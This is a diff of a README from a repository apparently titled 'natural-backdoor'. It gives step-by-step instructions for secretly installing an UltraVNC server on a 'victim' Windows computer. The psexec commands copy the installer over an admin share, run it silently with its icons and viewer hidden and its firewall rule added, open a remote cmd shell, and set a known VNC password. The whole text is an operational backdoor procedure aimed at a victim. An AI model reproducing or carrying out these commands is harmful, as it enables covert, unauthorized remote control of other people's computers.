enseitankado/natural-backdoor/README.md

 ![Remote shell](remote-shell.png "Remote shell")

-## Install VNC Server to Victim
+# Install VNC Server to Victim

+You can remotely view or control the victim computer using the UltraVNC tool.
+For this, follow the steps below.

+## Step 1: Download UltraVNC setup

-### Step 1: Download latest ultravnc setup to host and rename to uvncsetup.exe
+Download the current version of ultravnc from the website and rename it to uvncsetup.exe.

-### Step 2: Copy unvcsetup.exe to victim computer with path \\victim\c$\uvncsetup.exe
+## Step 2: Copy setup to victim

+Copy the unvcsetup.exe file to the victim's computer's system disk.
+You can use this path: \\victim\c$\uvncsetup.exe

+## Step 3: Start installation

-### Step 3: To start silent installation on victim run uvncsetup.exe as remotely below:
+To start silent installation on victim computer run uvncsetup.exe as remotely using PsExec.exe below:

 > psexec \\victim -u admin -p admin0 -h -i -c C:\uvncsetup.exe /SP- /VERYSILENT /SUPPRESSMSGBOXES /NOCANCEL /NORESTART /CLOSEAPPLICATIONS /FORCECLOSEAPPLICATIONS /LOGCLOSEAPPLICATIONS /RESTARTAPPLICATIONS /NOICONS /FIREWALL /NOVIEW /COMPONENTS="ultravnc_server" /TASKS="installservice,startservice" /DIR="%programfiles%\uvnc"

-### Step 4: To define new password for UltraVNC server open a remote shell to victim computer below:
+## Step 4: Define new password

-psexec \\192.168.0.29 -u admin -p admin0 -h -i cmd.exe

-### Step 5: stop the uvnc_service service to set the password using the remote shell you opened in the previous step

-> net stop uvnc_service

-### Step 6: Create ultravnc.ini

 Create the ultravnc.ini file with the password defined in the "%programfiles%\uvnc" of the victim computer.
 UltraVNC password is "admin0" defined in ultravnc.ini.
 The ini file content is below: